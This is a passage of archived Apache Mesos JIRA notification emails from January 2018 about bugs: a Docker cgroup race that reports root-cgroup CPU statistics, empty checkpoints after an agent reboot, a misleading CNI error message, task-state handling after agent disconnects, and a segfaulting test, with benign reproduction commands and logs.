> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Fix Version/s: 1.6.0

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.6.0
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336702#comment-16336702
 ] 

Qian Zhang commented on MESOS-6822:
---

RR: https://reviews.apache.org/r/65306/

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk
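
For context on how an error message can end in "Success": on Linux/glibc, formatting an error with {{strerror(errno)}} when {{errno}} is 0 (for example because the failure was a child command's non-zero exit status rather than a failed syscall) yields the string "Success". A minimal sketch of that anti-pattern follows; it is an illustration only, not necessarily the isolator's actual code.
{noformat}
#include <cerrno>
#include <cstdlib>
#include <cstring>
#include <iostream>

int main()
{
  errno = 0;

  // The child command fails (non-zero exit status), but no syscall in this
  // process failed, so errno is still 0. Think of `false` as standing in
  // for something like bringing up the loopback interface failing.
  int status = std::system("false");

  if (status != 0) {
    // Anti-pattern: reporting errno here prints "...: Success".
    std::cerr << "Failed to bring up the loopback interface: "
              << std::strerror(errno) << std::endl;

    // Better: report the command's exit status (or its captured stderr).
    std::cerr << "Command exited with status " << status << std::endl;
  }

  return 0;
}
{noformat}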



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)
Chun-Hung Hsiao created MESOS-8481:
--

 Summary: Agent reboot during checkpointing may result in empty 
checkpoints.
 Key: MESOS-8481
 URL: https://issues.apache.org/jira/browse/MESOS-8481
 Project: Mesos
  Issue Type: Bug
Reporter: Chun-Hung Hsiao
Assignee: Michael Park


An empty checkpoint file was created due to the following incident.

At 17:12:25, the master assigned a task to an agent:
{noformat}
I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 ()
I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] 
on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
()
{noformat}
Meanwhile, the agent is being rebooted:
{noformat}
$ last reboot
reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
{noformat}
The agent log did not show any information about the task, possibly because 
there was no fsync before reboot:
{noformat}
I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
-- Reboot --
I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
/var/log/mesos/mesos-agent.log
{noformat}
However, the agent was checkpointing the task before reboot:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
  Size: 39  Blocks: 0  IO Block: 4096   directory
Device: ca40h/51776dInode: 67306254Links: 3
Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-24 00:23:43.237322609 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
And since there was no fsync before reboot, all checkpoints resulted in empty 
files:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967500Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:15:41.485506070 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967495Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 23:00:42.190975780 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 67306255Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:12:25.751463030 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
So were {{forked.pid}} and {{task.info}}.

As a result, the agent failed to recover after reboot:
{noformat}
E0123 17:15:41.00  2709 slave.cpp:6800] EXIT with status 1: Failed to 
perform recovery: Failed to recover framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from 

[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336700#comment-16336700
 ] 

Jie Yu commented on MESOS-8480:
---

I checked the kernel code; it looks like when a process exits (or is killed) but 
hasn't been reaped yet (i.e., is a zombie), the proc file `/proc//cgroup` will 
still exist, but the cgroup of the task will be set to the root cgroup:

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5194]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n1003]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/exit.c?h=v4.1.49#n757]

[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5357]
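
The behavior is straightforward to observe outside Mesos. Below is a minimal sketch (assuming the parent itself runs inside some non-root cgroup, so the reset is visible) that forks a child, kills it without reaping it, and then dumps the zombie's {{cgroup}} proc file; per the kernel code linked above, every hierarchy should show {{/}}.
{noformat}
#include <fstream>
#include <iostream>
#include <string>

#include <signal.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
  pid_t pid = ::fork();
  if (pid < 0) {
    return 1;
  }

  if (pid == 0) {
    ::pause();  // Child: wait until killed.
    _exit(0);
  }

  ::kill(pid, SIGKILL);
  ::sleep(1);  // Give the kernel time to turn the child into a zombie.

  // We intentionally do not wait(2) on the child before reading, so the
  // child is still a zombie and its /proc entry still exists.
  std::ifstream cgroup("/proc/" + std::to_string(pid) + "/cgroup");
  std::cout << cgroup.rdbuf();  // Expect lines like "9:cpuacct,cpu:/".

  return 0;
}
{noformat}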

 

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-7911:
---
Description: 
Currently, when a framework with checkpointing disabled has tasks running on an 
agent and that agent disconnects from the master, the master will mark those 
tasks LOST and remove them from its memory. The assumption is that the agent is 
disconnecting because it terminated.

However, it's possible that this disconnection occurred due to a transient loss 
of connectivity and the agent re-connects without ever having terminated. This 
case violates our assumption that the agent has no tasks unknown to the master:

```
void Master::reconcileKnownSlave(
    Slave* slave,
    const vector<ExecutorInfo>& executors,
    const vector<Task>& tasks)
{
  ...

  // TODO(bmahler): There's an implicit assumption here the slave
  // cannot have tasks unknown to the master. This _should_ be the
  // case since the causal relationship is:
  //   slave removes task -> master removes task
  // Add error logging for any violations of this assumption!
```

As a result, the tasks would remain on the agent but the master would not know 
about them!

A more appropriate action here would be:

# When an agent disconnects, mark the tasks as unreachable.
## If the framework is not partition aware, only show it the last known task 
state.
## If the framework is partition aware, let it know that it's now unreachable.
# If the agent re-connects:
## And the agent had restarted, let the non-checkpointing framework know its 
tasks are GONE/LOST.
## If the agent still holds the tasks, the tasks are restored as reachable.
# If the agent gets removed:
## For partition-aware non-checkpointing frameworks, let them know the tasks 
are unreachable.
## For non-partition-aware non-checkpointing frameworks, let them know the 
tasks are lost, and kill the tasks if the agent comes back.

  was:
Currently, when a framework with checkpointing disabled has tasks running on an 
agent and that agent disconnects from the master, the master will mark those 
tasks LOST and remove them from its memory. The assumption is that the agent is 
disconnecting because it terminated.

However, it's possible that this disconnection occurred due to a transient loss 
of connectivity and the agent re-connects while never having terminated. This 
case violates our assumption of there being no unknown tasks to the master:

```
void Master::reconcileKnownSlave(
    Slave* slave,
    const vector<ExecutorInfo>& executors,
    const vector<Task>& tasks)
{
  ...

  // TODO(bmahler): There's an implicit assumption here the slave
  // cannot have tasks unknown to the master. This _should_ be the
  // case since the causal relationship is:
  //   slave removes task -> master removes task
  // Add error logging for any violations of this assumption!
```

As a result, the tasks would remain on the agent but the master would not know 
about them!

A more appropriate action here would be:

(1) When an agent disconnects, mark the tasks as unreachable.
  (a) If the framework is not partition aware, only show it the last known task 
state.
  (b) If the framework is partition aware, let it know that it's now 
unreachable.
(2) If the agent re-connects:
  (a) And the agent had restarted, let the non-checkpointing framework know its 
tasks are GONE/LOST.
  (b) If the agent still holds the tasks, the tasks are restored as reachable.
(3) If the agent gets removed:
  (a) For partition aware non-checkpointing frameworks, let them know the tasks 
are unreachable.
  (b) For non partition aware non-checkpointing frameworks, let them know the 
tasks are lost and kill them if the agent comes back.


> Non-checkpointing framework's tasks should not be marked LOST when agent 
> disconnects.
> -
>
> Key: MESOS-7911
> URL: https://issues.apache.org/jira/browse/MESOS-7911
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Mahler
>Priority: Critical
>  Labels: reliability
>
> Currently, when a framework with checkpointing disabled has tasks running on an 
> agent and that agent disconnects from the master, the master will mark those 
> tasks LOST and remove them from its memory. The assumption is that the agent 
> is disconnecting because it terminated.
> However, it's possible that this disconnection occurred due to a transient 
> loss of connectivity and the agent re-connects while never having terminated. 
> This case violates our assumption of there being no unknown tasks to the 
> master:
> ```
>  void Master::reconcileKnownSlave(
>  Slave* slave,
>  const vector& executors,
>  const vector& tasks)
>  {
>  ...
> // TODO(bmahler): There's an implicit assumption here the slave
>  // cannot have tasks unknown to the master. This _should_ be the
>  // case since the causal relationship 

[jira] [Updated] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8453:
---
Sprint: Mesosphere Sprint 73

> ExecutorAuthorizationTest.RunTaskGroup segfaults.
> -
>
> Key: MESOS-8453
> URL: https://issues.apache.org/jira/browse/MESOS-8453
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Affects Versions: 1.5.0
> Environment: Ubuntu 14.04 with SSL.
>Reporter: Alexander Rukletsov
>Assignee: Benjamin Mahler
>Priority: Major
>  Labels: flaky-test
> Attachments: RunTaskGroup-badrun.txt
>
>
> {noformat}
> 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if 
> you are using GNU date ***
> 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID 
> 0x7f36e2722700) from PID 18446744072769538424; stack trace: ***
> 14:32:50 @ 0x7f36dcc763fd (unknown)
> 14:32:50 @ 0x7f36dcc7b419 (unknown)
> 14:32:50 @ 0x7f36dcc6f918 (unknown)
> 14:32:50 @ 0x7f36eb99e330 (unknown)
> 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 @ 0x7f36ef12bd22 
> _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_
> 14:32:50 @ 0x7f36ef12c834 
> _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv
> 14:32:50 @ 0x7f36ee1c1e8a 
> _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_
> 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume()
> 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume()
> 14:32:50 @ 0x7f36ef134216 
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv
> 14:32:50 @ 0x7f36ec15a5b0 (unknown)
> 14:32:50 @ 0x7f36eb996184 start_thread
> 14:32:50 @ 0x7f36eb6c2ffd (unknown)
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.

2018-01-23 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8453:
--

Assignee: Benjamin Mahler

> ExecutorAuthorizationTest.RunTaskGroup segfaults.
> -
>
> Key: MESOS-8453
> URL: https://issues.apache.org/jira/browse/MESOS-8453
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Affects Versions: 1.5.0
> Environment: Ubuntu 14.04 with SSL.
>Reporter: Alexander Rukletsov
>Assignee: Benjamin Mahler
>Priority: Major
>  Labels: flaky-test
> Attachments: RunTaskGroup-badrun.txt
>
>
> {noformat}
> 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if 
> you are using GNU date ***
> 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID 
> 0x7f36e2722700) from PID 18446744072769538424; stack trace: ***
> 14:32:50 @ 0x7f36dcc763fd (unknown)
> 14:32:50 @ 0x7f36dcc7b419 (unknown)
> 14:32:50 @ 0x7f36dcc6f918 (unknown)
> 14:32:50 @ 0x7f36eb99e330 (unknown)
> 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count()
> 14:32:50 @ 0x7f36ef12bd22 
> _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_
> 14:32:50 @ 0x7f36ef12c834 
> _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv
> 14:32:50 @ 0x7f36ee1c1e8a 
> _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_
> 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume()
> 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume()
> 14:32:50 @ 0x7f36ef134216 
> _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv
> 14:32:50 @ 0x7f36ec15a5b0 (unknown)
> 14:32:50 @ 0x7f36eb996184 start_thread
> 14:32:50 @ 0x7f36eb6c2ffd (unknown)
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8479) Document agent SIGUSR1 behavior.

2018-01-23 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8479?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach updated MESOS-8479:
---
Summary: Document agent SIGUSR1 behavior.  (was: Document agne SIGUSR1 
behavior.)

> Document agent SIGUSR1 behavior.
> 
>
> Key: MESOS-8479
> URL: https://issues.apache.org/jira/browse/MESOS-8479
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, documentation
>Reporter: James Peach
>Priority: Major
>
> The agent enters shutdown when it receives {{SIGUSR1}}. We should document 
> what this means, the corresponding behavior and how operators are intended to 
> use this.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.

2018-01-23 Thread JIRA

[ 
https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16291303#comment-16291303
 ] 

Gastón Kleiman edited comment on MESOS-8184 at 1/23/18 10:18 PM:
-

[https://reviews.apache.org/r/65300/]

[https://reviews.apache.org/r/64618/]


was (Author: gkleiman):
https://reviews.apache.org/r/64618/

> Implement master's AcknowledgeOfferOperationMessage handler.
> 
>
> Key: MESOS-8184
> URL: https://issues.apache.org/jira/browse/MESOS-8184
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Gastón Kleiman
>Priority: Major
>  Labels: mesosphere
>
> This handler should validate the message and forward it to the corresponding 
> agent/ERP.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Story Points: 2  (was: 3)

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
